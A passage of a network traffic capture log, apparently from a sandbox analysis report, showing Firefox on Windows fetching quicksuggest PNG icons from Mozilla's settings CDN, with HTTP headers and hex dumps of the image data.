2024-07-26 18:11:03 UTC	730	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AHxI1nNM6B6FOOl6NXZ98klqUo84uzbk59hN8H4DSs-neP8YHxra9sVZdv4LVzATy-fOSnZRhws x-goog-generation: 1678716183776605 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 9061 x-goog-meta-goog-reserved-file-mtime: 1622490411 x-goog-hash: crc32c=DswUrA== x-goog-hash: md5=oOxDnspIec1A9HNDoIFh3w== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 9061 Server: UploadServer Date: Fri, 26 Jul 2024 03:41:45 GMT Cache-Control: public,max-age=604800 Age: 52158 Last-Modified: Mon, 13 Mar 2023 14:03:03 GMT ETag: "a0ec439eca4879cd40f47343a08161df" Content-Type: application/octet-stream Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	660	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 23 2c 49 44 41 54 78 da ed 7d 89 93 5b e9 71 df f7 0e 60 66 c8 e5 b5 3c 96 e7 92 03 e0 01 78 c7 f7 2e 60 2e 60 0e 60 86 a4 b4 b2 a5 75 5c b1 92 b2 5d 25 55 e4 78 93 b2 52 92 aa ec 28 76 12 a5 62 1d 95 ac 9c c8 b2 14 29 56 59 3e 74 58 5a af 95 dd 44 da 8d 56 a2 d6 ab 25 39 24 07 83 7b 00 0c b9 71 fe 96 74 f7 f7 1e f0 30 c3 2c 87 89 76 6b 96 7c af 5e 81 18 0c 07 98 e9 fe be ee 5f 77 ff ba 3f c6 1e ab 4b a2 5b 0e 9f 44 5e 53 e8 8e bc bc e3 8b f8 fa c5 ea e0 7e 0a 90 62 05 bc eb 17 ec 05 59 1a bf 59 70 b3 f0 31 be de 2d 05 b0 fb df f1 f5 0e 5a a0 dd e2 56 e9 8e 15 f0 ee b9 80 f1 57 63 a1 bf 0b 0a 18 a1 1d 69 fc 96 ff 6f fa 89 af 77 60 07 dc 47 fa b1 02 de Data Ascii: PNGIHDRL\#,IDATx}[q`f<x.`.``u\]%UxR(vb)VY>tXZDV%9${qt0,vk\|^_w?K[D^S~bYYp1-ZVWciow`G
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: d2 1f 70 de e7 46 df cc 6c 59 e9 96 95 de f2 8c 96 ad b7 6d bd a7 6b ed b5 ea 3f 3c 30 71 32 76 c2 0f 97 de 89 2a 00 1e 92 6c 18 4b 81 25 f9 00 63 af ad 55 af 17 cc 06 d7 b6 2c 94 fe b6 63 f5 ac 5c d7 ca 6e f1 5c df d1 3b 3c d7 34 f5 b6 63 75 5c fe 6a b9 08 0a 3b 28 b1 38 18 7b b0 f4 03 d9 87 cb 5d 12 09 9c 04 6e 0a 49 38 00 49 06 7c f9 1f 2f 5e ac 2f 2e 6c 38 46 d7 35 ef d9 f6 5d ce 41 ee 2d 9e e9 38 c6 96 63 c2 56 e8 e9 b9 2d c3 68 79 f6 ed a5 f9 4f 1c 9b 3a cb e2 48 6c ef eb 5f 1e 25 d1 02 05 24 f1 2b 90 fe 14 a1 4f 9b b1 37 2a 4b 2d 9e 47 0b c3 8d 7b 16 df 36 4c b0 45 2d 3f d7 71 cd 36 37 71 4f 98 66 df 30 9a 73 c5 17 17 67 66 28 4a 00 e3 15 eb e0 a1 14 80 be 37 b0 48 24 ba 09 26 81 ef 3d c7 d8 3f 3d 7b a2 b5 b6 08 e6 be 6f 64 fb 46 7e 3b 6f 6c 5b 56 Data Ascii: pFlYmk?<0q2vlK%cU,c\n\;<4cu\j;(8{]nI8I\|/^/.l8F5]A-8cV-hyO:Hl_%$+O7K-G{6LE-?q67qOf0sgf(J7H$&=?={odF~;ol[V
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: b9 9f ac cc 2d 50 ee 61 2a b4 f8 4a 54 07 94 4f 8d 4b 92 7b 89 03 d0 5a 83 0a 4e 31 f6 cf 8f 1e b8 be ba 78 db d1 b1 d8 3b 52 40 9e 14 90 03 1f 00 0a 18 70 0e 41 c0 66 79 f6 f9 f4 d3 e7 c0 fd ca 49 32 34 92 12 f4 4a 8e bf 79 1c 0a ec 29 1b 27 e1 2a ce 33 f6 b7 b3 7e 6b c6 ad 59 59 00 fb a0 80 8e 0b d8 5f 28 00 a5 0f 28 08 1e df 32 cd 3a e7 af 55 2b 1f 10 a9 37 49 51 30 96 50 c6 e5 1c d4 18 e2 6b 4f 91 f0 84 8c 71 ec 6f 1e 3f b4 59 5d 6c e7 d3 28 6b 50 80 a3 91 02 28 f4 25 e9 03 fa 84 6f 0d f4 7c 73 a1 f4 79 43 bf 48 c6 07 33 77 98 f9 d9 11 f7 26 28 ac 8b 43 81 bd 28 40 62 47 25 2c bc 7c 73 c6 af cf b8 3d 23 8d 14 2b 27 df 70 51 0d 20 fd 6d 6b a8 00 0d 1e 7b 9c df ac 54 2b 49 74 da 28 5f 44 9a 64 fd 65 36 22 61 49 94 59 a2 5d 10 2b e0 c1 17 2c ff 8f 4c 24 Data Ascii: -PaJTOK{ZN1x;R@pAfyI24Jy)'3~kYY_((2:U+7IQ0PkOqo?Y]l(kP(%o\|syCH3w&(C(@bG%,\|s=#+'pQ mk{T+It(_Dde6"aIY]+,L$
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: f3 f0 13 47 45 41 f1 83 49 96 80 4f f9 ba 91 03 5c 0f 10 13 2c 3e f6 bd 78 26 7a 02 6e 74 a9 02 0c fb 00 9c c1 16 cf d4 dd dc 8d ea dc 6f 1d 4a c2 af 91 50 26 83 86 0b 39 ec a2 d9 87 7b 3e 84 7d 54 a3 93 c4 a4 1d 39 81 5f 92 20 65 34 a3 ef 3b fc d4 d7 aa ef ff 66 d1 7b a1 68 be e8 9a 2f da d6 f7 1c fb 05 c7 fe 6f 96 f5 b2 65 7c cf d2 5e 2c da df 75 cc ef 78 c6 8b 73 c6 1f 15 8d d3 43 ec a2 0c 5b 47 91 f9 2d 89 c0 73 74 07 ff 84 de 96 4c 8f 1a fc 0e 22 15 07 30 08 d0 e7 95 44 e2 66 75 b1 c5 b3 2d cb c0 5c 7f 01 77 40 cf 71 3a dc 04 b8 d9 2e a6 e1 11 76 c6 5d c0 3f 45 ff bb 4b a5 70 d8 8c 2c dd 67 29 ec 33 05 a8 43 05 c8 aa 58 7d 94 77 24 ec 41 cd cf 87 19 2b 32 f6 17 a5 d5 9b a5 39 f8 cb 7b ae d1 73 ad fe 5c b1 eb 39 6f 79 de 3d cf de 9e b1 5b 05 a3 33 63 Data Ascii: GEAIO\,>x&zntoJP&9{>}T9_ e4;f{h/oe\|^,uxsC[G-stL"0Dfu-\w@q:.v]?EKp,g)3CX}w$A+29{s\9oy=[3c
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 38 88 2c 1c dc 25 12 ee 00 50 c0 c4 51 a6 c0 c2 fc 82 6d dc 2c db 6d fb 22 04 44 5b ae dd 41 71 e8 24 fd 2c 21 54 9c 03 86 99 7a 3b b3 b9 56 7e ee cc 53 67 89 5a 42 91 99 cc c2 29 00 a3 54 8f a4 ee 08 59 01 c6 70 c6 fe aa 54 be 53 74 07 36 aa 56 04 1c 20 fa a6 9f c6 f6 6b fc 44 0b 53 72 54 7b b9 b6 56 5a 4b 24 8f 51 e0 28 8d 55 14 46 81 ce 7e f4 c1 c3 4d 3a fc cb 87 a1 99 3a d2 86 2c 12 06 0a 6d 82 27 18 fe 9d 55 55 7a 7d 75 b6 53 cc 37 8d ac 98 80 41 0a 40 13 01 d2 6f a2 6f c4 49 9c 7d 37 73 ab a0 7f bf 54 9e 15 41 99 9a 88 7a dd e8 a4 07 f1 b9 49 61 31 68 dc c0 47 0f 1c fc f9 ca ca 26 d7 83 e8 d7 a1 db c5 4d 80 0d 30 a4 80 6d 43 df 72 cc 3b 65 ef 2b 76 f6 02 41 7e 49 8a a0 3b 91 0a 89 0c 30 96 f6 9f 02 c6 cf 50 1c 57 80 c4 76 f8 03 6c 26 99 90 12 82 95 Data Ascii: 8,%PQm,m"D[Aq$,!Tz;V~SgZB)TYpTSt6V kDSrT{VZK$Q(UF~M::,m'UUz}uS7A@ooI}7sTAzIa1hG&M0mCr;e+vA~I;0PWvl&
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 60 92 82 da 62 50 e4 02 23 b0 c0 d8 8f 9f 59 7d d3 21 8e 66 3e 7f 0f 53 37 98 b5 27 68 94 07 d1 83 0f 10 c3 22 5b 3c f3 fa ca fc 3c 65 cd 68 a9 aa 8a 94 3c 40 a1 f5 3f 39 79 a8 b6 3a 3f 70 21 bc 4a d1 f2 c7 13 5d 9a 1e b6 bd 63 c5 d1 d4 b0 0d 98 6b f7 cc 7c 6d 6e e6 d3 d9 d4 69 31 68 52 55 e8 5c 4e c4 98 49 59 19 99 b5 5d 0a 78 14 da 4e 05 a1 5e c6 f1 84 a3 d1 82 e0 03 9f 66 ec 5f 67 a7 ef 2c cf 75 ad 6c d7 c8 e1 90 60 17 0b f4 10 04 f4 0b 36 79 d1 ac 90 3e 84 4e b7 4a ee a7 52 17 2e 51 e5 44 c2 f4 74 e2 08 35 7c 7d 77 a9 78 6b ce ee 98 a9 01 fc a0 7e 69 5b 34 38 02 0a c2 e4 33 96 1e c5 e4 1f 08 08 6e 54 96 bd b0 d0 46 c3 ca 22 03 37 e4 51 39 66 1c 47 07 73 d6 df fb 30 68 f4 57 aa 43 d6 26 04 c6 cb aa 7c 6d 69 0e 6c 45 43 54 89 cd f4 c0 cd 0b d6 26 96 8b Data Ascii: `bP#Y}!f>S7'h"[<<eh<@?9y:?p!J]ck\|mni1hRU\NIY]xN^f_g,ul`6y>NJR.QDt5\|}wxk~i[483nTF"7Q9fGs0hWC&\|milECT&
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: a1 65 01 94 34 00 f3 34 4d 03 cc ce c0 35 82 ec 82 93 15 40 b3 8b 01 97 46 51 02 47 df cb 33 e4 39 40 3d bc 49 75 e6 6b f3 85 39 02 3f 0a 1b 11 63 1e 5f 05 8c f7 13 a8 41 a7 5d d0 82 45 63 4d 12 d8 98 78 84 78 d4 7f 77 a5 02 78 1f 16 7e cb 32 20 bc ea db b0 21 f4 3e ce d6 c0 91 f2 d8 56 e7 6a bd 40 01 1c 03 05 90 38 28 c0 ca 75 4d 8c 1e 36 78 fe 6e 75 f1 73 27 9e 3c 17 16 41 a3 5b ee 31 35 41 e3 0a 08 4f b1 93 70 0e 8f 24 8e 74 09 fa 9c b0 65 f5 3f 64 d3 37 ca 33 4d 1f 49 bb b0 c6 f1 1c 6b 13 8b ba 44 5f 44 12 63 a0 00 0c be 78 97 73 9a f5 86 d2 c7 78 58 cf 6c 38 c6 1b 6b d5 35 61 fd b1 6c 2c 33 55 30 85 1f 57 07 a0 8c bb 01 71 7a 4e 40 ef 15 b5 4a 39 b0 d1 52 02 8b ef 20 bb 97 16 17 36 0b 7c 1b 8c 3b 1e 62 64 88 28 17 db f9 fc 11 f4 c4 c8 8b 14 20 c2 34 Data Ascii: e44M5@FQG39@=Iuk9?c_A]EcMxxwx~2 !>Vj@8(uM6xnus'<A[15AOp$te?d73MIkD_DcxsxXl8k5al,3U0WqzN@J9R 6\|;bd( 4
2024-07-26 18:11:03 UTC	61	IN	Data Raw: 2d 45 99 5e ea 8e 51 45 b1 a0 ff bf 24 bf e3 d9 d8 b4 6a 69 27 e6 09 c3 2b 75 b8 c6 95 5d 11 80 b2 af c7 d1 3f dc f5 7f 00 89 ce c5 0c 63 46 04 ed 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: -E^QE$ji'+u]?cFIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	64233	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	334	OUT	GET /main-workspace/quicksuggest/20f6c216-2267-4b1e-af58-22d224043fe9 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	732	IN	HTTP/1.1 200 OK x-goog-generation: 1678716161228558 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 13554 x-goog-meta-goog-reserved-file-mtime: 1654282189 x-goog-hash: crc32c=cpBCzQ== x-goog-hash: md5=VUN2gfGcAKHgjtogXBAE1Q== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 13554 X-GUploader-UploadID: AHxI1nOkxSd7SVScLRcz5sU1iQjx58jr9s8EuNexkemySL7sixK0gjQBicpiQiR5b65e1-eTMMw Server: UploadServer Date: Fri, 26 Jul 2024 03:41:45 GMT Cache-Control: public,max-age=604800 Age: 52158 Last-Modified: Mon, 13 Mar 2023 14:02:41 GMT ETag: "55437681f19c00a1e08eda205c1004d5" Content-Type: application/octet-stream Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	658	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 34 b9 49 44 41 54 78 da ed 7d 07 98 64 65 95 76 ff ff ca 4c 57 0e dd 3d ec ba 3e bf 8f fb 3c ba c1 5d 61 72 f7 84 0e 95 bb 07 77 d7 f0 bb c1 0d ea 82 11 99 81 c9 91 01 26 30 cc 74 a8 5c 1d 06 10 85 45 09 0a c8 22 2e 8b c0 80 88 ae 8a 2b 2e 23 02 06 24 48 9a 61 52 77 55 dd f0 9f f0 7d f7 de aa ae aa a9 aa ee 46 d9 e7 6f ce f3 51 53 75 eb d6 bd df 7b be 93 be 73 ce 6d 71 87 d3 4c 9e 48 66 26 e4 8d 66 81 66 78 92 d9 a2 1a b7 33 5b d7 c9 e7 39 eb d9 ce 7a 4c 8b 01 80 71 d1 b5 f1 38 2b 60 d6 13 ce 16 ba d5 4e 3b 8b 3f 31 5b a7 6d f4 bb 2d 35 6e c9 15 4a 59 c9 fa 66 35 d8 e6 6e 8e 6a 5f 64 d9 f9 6b 70 1c 1f 56 c6 98 4d 5f 73 3d 77 5d fb 3c 2d 75 ce 7e 19 0c Data Ascii: PNGIHDRL\4IDATx}devLW=><]arw&0t\E".+.#$HaRwU}FoQSu{smqLHf&ffx3[9zLq8+`N;?1[m-5nJYf5nj_dkpVM_s=w]<-u~
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 24 e1 8b 24 3c d1 84 3b 96 90 0c 9e 23 5e 60 32 01 70 85 e0 27 73 de 50 ce 63 7e 8a e4 8a 64 89 d2 65 e4 0d 37 46 72 f5 54 20 eb 01 fc 9a b9 c1 19 2d 21 fe 5d 5e 22 ae 48 d2 45 d8 b8 c2 09 20 4f 28 e1 0f c3 2d 0b 81 c3 73 6d 4e 42 38 25 56 2d 2d 0e f9 4e 63 92 bc 51 00 c4 ec 97 00 60 c1 40 ce 6f ce 5c ec 96 05 6e e5 32 21 16 62 25 04 ef f8 a3 59 a0 b6 c8 2c 8f 34 6b 78 72 d4 1f 52 28 91 80 4a 33 e1 2d c4 12 65 04 b7 40 00 e4 60 89 20 bb 84 19 03 9a 07 9a 04 c6 40 9c 9c 68 6e 01 28 95 39 86 2c 82 0b 8d d3 98 e0 f7 ad 62 dd 1f 4d f3 47 ee 48 1c c8 15 1e 11 2f 88 d7 88 98 07 79 41 64 0d e4 ca 46 6f 18 19 b3 fe 11 a5 81 e5 1d 66 67 5c 10 a1 74 5b 30 0b 23 11 7e 04 04 cc c4 17 e6 8a 22 39 63 44 d1 24 a0 42 f2 93 c5 66 5a 8c 02 bc 14 c3 d3 1e 02 ca 11 8d fa 05 Data Ascii: $$<;#^`2p'sPc~de7FrT -!]^"HE O(-smNB8%V--NcQ`@o\n2!b%Y,4kxrR(J3-e@` @hn(9,bMGH/yAdFofg\t[0#~"9cD$BfZ
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 25 54 d0 95 a2 ae a8 62 66 f4 fa 46 49 6a bd 23 5c 0b 4c 38 cd 39 bf 56 81 21 08 12 8d df 52 94 02 41 82 57 58 50 f2 74 b5 78 8c c1 22 b0 74 40 6a fd e0 79 3d 78 51 da b5 72 b3 37 7c 90 dc 88 84 17 94 76 3f 59 ab 4d 03 50 16 b9 ac bc 02 c2 49 cf 40 ce bb 66 d4 11 8a b7 47 33 ed 81 c1 79 ef 5d 7b f1 81 07 7f 7e 02 b9 03 24 f8 94 7a 86 fe 5f 54 8b 38 a9 f9 c9 29 64 2b 62 34 c1 6b c0 fe 6a a1 a8 c2 5c c3 fd 15 80 60 f6 41 f6 e4 35 10 00 45 d5 60 cd 7a ff f4 86 48 97 18 08 00 e4 fb c0 ea b4 50 f1 10 e0 0f b8 42 e6 12 78 a7 00 f2 11 d7 8e ae 4c 9e c2 5b d2 d4 7c 41 9b 24 3d 31 78 eb 51 f7 f2 b5 8e 55 bb bc a1 41 d0 82 68 98 34 9a 1b 5a 63 ff af c2 a6 18 38 5f fd e3 9e e8 58 eb aa e1 b7 c7 d2 0b 56 5e f1 8e 95 1b 6e b8 f7 57 2c 70 4e c1 95 69 53 20 60 15 75 0a Data Ascii: %TbfFIj#\L89V!RAWXPtx"t@jy=xQr7\|v?YMPI@fG3y]{~$z_T8)d+b4kj\`A5E`zHPBxL[\|A$=1xQUAh4Zc8_XV^nW,pNiS `u
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 07 f0 4d 00 8c 9c 12 01 80 48 b8 10 00 8c 03 d1 0e 6a d2 19 19 76 f5 c7 6d 91 0c 00 d0 16 4a 3a df f7 b9 d7 35 f0 75 a5 2b 82 96 73 41 2b 82 22 52 65 48 4b d3 e4 c4 f1 8a 26 0d ac 20 a1 e4 a5 15 6d c4 c4 a6 ad 7a 92 d1 cd 58 41 f5 3a cd 25 f6 98 66 fd 75 ba 7e e4 91 49 32 90 4c cb 47 d5 ca 66 5f 5c 12 dc 40 41 e1 43 c0 a1 03 1f 54 2f 9c 82 13 82 4f d0 b6 72 8b b7 6f 90 d9 df 19 4c 82 31 8a a1 9d 18 6f 61 65 d8 d2 31 01 f0 c4 70 93 7a 3a 00 be 10 6e d4 79 07 92 b6 d8 b0 23 86 ee 98 7b d5 81 ae bf 1d 3a cd 66 8c b1 48 69 5a e1 b2 0a 1c 7f e0 4b 64 b3 47 d8 ef 05 a1 25 54 66 34 b8 3d 85 0c 0e ba 49 4d fa 42 c5 02 2e 2b 12 5b 8c 0d b8 c4 e8 15 2b 05 7e 51 95 e0 00 49 1c 47 ab 4d f8 2b 45 94 e9 60 bb b0 67 8b 96 8c 26 7c ad 29 0d 16 a9 3e 49 b2 1d ff 03 a9 c9 Data Ascii: MHjvmJ:5u+sA+"ReHK& mzXA:%fu~I2LGf_\@ACT/OroL1oae1pz:ny#{:fHiZKdG%Tf4=IMB.+[+~QIGM+E`g&\|)>I
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 00 c2 19 d1 8d 50 09 0b 75 ad 0c 80 02 ca 47 0a 53 eb 1c 29 02 a9 0a 92 55 7f 4d d7 c3 9f 1c 77 83 c7 18 4d d8 02 c3 6d 17 1c 46 77 31 9c c3 a8 5f 2c cd 51 10 4a 2f b4 38 28 a5 64 26 77 96 e5 69 4b c2 fb 22 2a cb e2 c6 c5 11 cc b4 07 31 e1 a7 3d 9a f1 c6 c6 5b 23 87 5d fd d7 b5 87 13 7f b0 7a f3 b3 c7 c8 40 20 7b 6d 4a 84 58 74 8b c0 a9 02 80 6a 00 80 93 71 f3 3d 47 61 ba c0 0a 72 84 92 e8 03 07 33 e8 0a d0 ca e6 04 5e 99 f8 65 f1 84 2d d9 d8 46 2e 7f 86 b8 06 73 9b fd 91 b1 d6 85 eb 6f be ef c9 29 bd cc 89 2f f5 71 a4 2b 6c 04 b3 54 b9 e9 41 3b 33 1a 6f bf bf a1 eb ff 7a e4 a5 d6 25 1b 7d 81 f8 02 98 29 4c aa 48 32 53 10 f6 18 04 b4 a4 fc c9 8c 57 92 a7 40 ce 70 82 05 a3 0d b3 71 50 34 19 e9 cd d6 e2 00 23 b1 b0 94 b2 68 e3 45 46 61 ba 3b c2 c3 30 c2 99 Data Ascii: PuGS)UMwMmFw1_,QJ/8(d&wiK"*1=[#]z@ {mJXtjq=Gar3^e-F.so)/q+lTA;3oz%})LH2SW@pqP4#hEFa;0
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 1b 2e 94 72 2f 8c da ca 1c c9 c7 04 17 bf 09 57 4b 84 05 73 98 ff 1b 8b 7b 82 87 bc e1 38 af 00 7b 77 dc be f2 6a 4f ef 21 47 cf 41 7b dd 04 07 bb 57 0f 02 d9 7b 06 5b 7b 05 39 ba 07 5d dd 07 81 1c 3d d7 b4 f6 5e 33 bf 0f c9 d6 73 c0 b9 1a 09 de e4 2f 56 1b 1d bd 87 9c 70 19 34 ba 7b 0e b6 ad de ef e9 da db 11 c6 0d 61 17 41 e2 8e c5 5d d1 11 2f 96 d9 a4 05 00 e0 ed f6 0f 73 89 91 00 c0 a8 fa 34 c5 9c d4 01 b3 0e c0 c5 c3 8f b4 76 5e e9 27 81 03 96 32 da f2 e1 9c 09 80 54 ad a4 2d d1 4e 20 6f 00 2c 9f 38 32 57 34 d9 16 4b b5 ae ba fa bd 7f 7f 7d cf 67 6e 5c 7d e1 f8 aa 8b 0e 57 a4 d5 9f bc 76 3a 75 5f 74 6d df 85 d7 f6 5e 08 af 27 56 7c 9a e8 53 d7 76 5f 78 43 2f d2 f5 f0 e9 aa 4f 31 4d c0 99 7b ff 65 3c f0 89 c3 bd ff 72 b8 a7 3e 82 d3 f6 5d 38 11 fa a7 Data Ascii: .r/WKs{8{wjO!GA{W{[{9]=^3s/Vp4{aA]/s4v^'2T-N o,82W4K}gn\}Wv:u_tm^'V\|Sv_xC/O1M{e<r>]8
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: ae bf d5 01 d0 2d 00 a0 48 c5 60 dc d0 a3 ad cb f7 1a 3b 59 3e 4b 05 a1 11 9b 13 7b f1 61 a3 39 1d c6 a2 41 04 61 0f b1 d0 41 67 d7 86 d4 d7 7f c6 59 85 86 34 af 6f 94 a5 f1 66 1a 99 62 54 88 68 66 01 61 93 b3 ff bb 08 80 ac 12 28 50 aa 31 02 b0 76 e8 51 7b e7 3e 2a 66 2b 07 80 b5 2e 6f 00 d0 01 29 91 29 d3 9f e0 c6 57 9e 50 aa 2d 78 d0 d3 b9 2e 73 d7 4f b0 44 50 2d d6 5f 9d 61 0d 0b 1a a9 e7 94 54 78 5a c3 90 0f 95 19 96 14 30 35 53 7f f0 bb 08 00 a5 2e 99 00 ac 1b 7c c4 d9 79 95 8f 42 ea 1c d0 f7 c8 d4 6d 51 d2 26 db fe 89 5d c9 35 49 e7 00 ee 75 f0 d6 4a 7b 60 d0 b3 6c 6d e6 ce 27 4f b3 03 db 48 ab 02 29 d6 4b ea 06 39 e9 93 8b 1b 44 3a 37 e7 38 55 aa e9 9c 73 00 cc 46 11 d2 11 c3 b4 94 c8 98 6d d1 65 8f 1e 3d d5 04 00 ba 68 c4 51 50 b5 29 45 cb e3 8e Data Ascii: -H`;Y>K{a9AaAgY4ofbThfa(P1vQ{>*f+.o))WP-x.sODP-_aTxZ05S.\|yBmQ&]5IuJ{`lm'OH)K9D:78UsFme=hQP)E
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 9b 82 ab a0 35 ac ae c7 0c f5 27 4e e8 f3 df 77 51 47 60 2f 45 78 c0 0a 1a f5 f5 4f b8 b0 1b d4 b0 33 34 6c 54 58 50 b1 06 76 ad 95 dd b4 67 44 9c 09 e2 0d 72 dd 56 d6 0b 36 18 a6 bd c4 17 04 f7 3b cf fb cc cd 0f fe e6 24 4b 7f 6c 04 a0 aa dc 0d 40 15 2d 6a a8 bc 59 2b 5a fc 38 63 cb de 08 5f d3 6d 62 fb a0 f7 fc d5 e0 39 dd c3 ae 18 2d 53 6c b3 91 05 8b 03 13 2f 8d e6 d2 b4 53 0f 64 02 80 99 f2 31 ce c5 c4 23 da 29 7d 1e eb ed a3 d7 7a c2 87 1d cb 77 7d 62 f7 4d 6f 08 f9 c8 ed bd 34 23 c2 43 5b e0 b2 72 58 d4 c5 6b a5 3d 4a c8 cb 47 fb 22 5f a4 93 c0 a9 6e ba ff 57 bf df f9 19 6f e7 c6 73 23 98 5f 05 e6 90 97 32 c8 a8 e9 7d 8a ab 07 29 6b 33 83 48 f0 9a 9d f1 08 ea 04 13 d6 a8 e8 8c ca 72 e2 be 55 bb fd 8b 3e f7 c9 1d 37 9e e2 d9 2f 08 de e2 0e 66 bc 55 Data Ascii: 5'NwQG`/ExO34lTXPvgDrV6;$Kl@-jY+Z8c_mb9-Sl/Sd1#)}zw}bMo4#C[rXk=JG"_nWos#_2})k3HrU>7/fU
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: d6 6a 00 88 87 3e 05 33 54 5d 46 ae 3f 59 47 ce 40 ce bd ea c0 f9 1f d8 f3 42 91 45 de 14 06 9a a7 a6 74 6a 19 65 2d d4 e6 72 72 9e 65 ab a1 66 a9 ac b7 08 66 d9 32 b1 58 da 8a 6f 6e 46 85 8c 96 bc a5 ef 89 d9 ca cb 28 75 37 7a be b0 dc 97 8d d4 2c b3 4f 65 d9 3a 63 c4 00 14 15 b5 70 1a 96 c9 d1 63 fa bb 22 3b 3d dd 7b 30 c2 11 4b 8b 7a ff 10 87 fc 72 5c 2c 85 c6 4e 64 44 28 61 e3 71 47 56 47 99 31 e0 40 bc e8 98 1e 49 81 31 0a 90 38 96 6f 99 b8 ef 79 2c 27 07 33 f4 cc 49 1d 2b c7 a5 fc d7 74 6b df 4d 32 49 35 8b 12 50 64 d3 1a 45 ba cd ba 75 6f 56 54 3b 1b db 38 73 32 2a 94 ef 36 69 d5 a8 e2 02 d4 d2 6e 69 72 65 68 66 f3 cd 92 8e 67 42 cf 14 a5 49 aa a2 45 0e 86 dc 8d 0f bd ec e9 dc b4 80 e6 d7 19 8a d3 f3 9f d2 a0 87 45 86 47 58 84 b6 8c 36 4d d3 01 18 Data Ascii: j>3T]F?YG@BEtje-rreff2XonF(u7z,Oe:cpc";={0Kzr\,NdD(aqGVG1@I18oy,'3I+tkM2I5PdEuoVT;8s2*6inirehfgBIEEGX6M
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 28 4b 1b 5c 01 c5 bc b5 11 b4 68 f2 4c 95 bd d6 11 05 82 52 98 3e 56 2e 47 d5 94 b2 6e d2 c6 fb fc 73 fc 70 1e eb e3 9a e4 e3 0d 64 00 dc 12 06 cf cb 3d d4 67 ce e8 37 7f e7 d8 67 86 1e fa a3 35 07 de b6 70 a3 73 d5 be 05 d1 d4 82 81 8c b3 6f d0 1d 8c fb 07 b2 8e 40 62 a6 8f 32 3c ab 0e 90 8f a1 cd 76 f4 4f a0 93 8d 09 bc d8 c4 04 cc 53 6a 93 34 e6 0c 65 5d bd c3 ae 55 7b 3c cb 36 ff 61 cf fa e0 3f ef fb dc 9e 1b ae bd fb 89 6f ff 6c ea a7 af e9 cf 9d d6 5f 55 4a 50 b1 36 76 ce 37 9e 69 5b ed 51 91 b5 0f 3b 5d 4a 7c 3d 4c f8 20 49 55 ff cd 94 fe ab 37 f4 67 5e d5 1f fc e1 ab 37 dc f9 e3 75 57 df da f7 f1 ab df 11 da 68 5b be de d5 73 b5 bd 67 f8 dc 35 d7 61 1f 1a cc d7 4b d2 f3 c5 a9 f9 a6 e8 57 3f 67 00 a0 2f 06 38 f7 a3 77 07 8c ef 0b 0c fb 83 d8 fc 11 Data Ascii: (K\hLR>V.Gnspd=g7g5pso@b2<vOSj4e]U{<6a?ol_UJP6v7i[Q;]J\|=L IU7g^7uWh[sg5aKW?g/8w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	64236	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	334	OUT	GET /main-workspace/quicksuggest/4390d749-61a9-4b7a-ac8f-88a2a8145c59 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	732	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AHxI1nNGMBWoLga8e5rW9N6lIHv1Nam-AW529C1VGcb90AUwk2s14xrZmQ1iBh3SzongqCThcrc x-goog-generation: 1678716168975720 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 16120 x-goog-meta-goog-reserved-file-mtime: 1654282190 x-goog-hash: crc32c=yIPV5g== x-goog-hash: md5=eFE6hQbZ3ouA/iYpsaU7fQ== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 16120 Server: UploadServer Date: Fri, 26 Jul 2024 03:43:13 GMT Cache-Control: public,max-age=604800 Age: 52070 Last-Modified: Mon, 13 Mar 2023 14:02:48 GMT ETag: "78513a8506d9de8b80fe2629b1a53b7d" Content-Type: application/octet-stream Alt-Svc: clear Connection: close
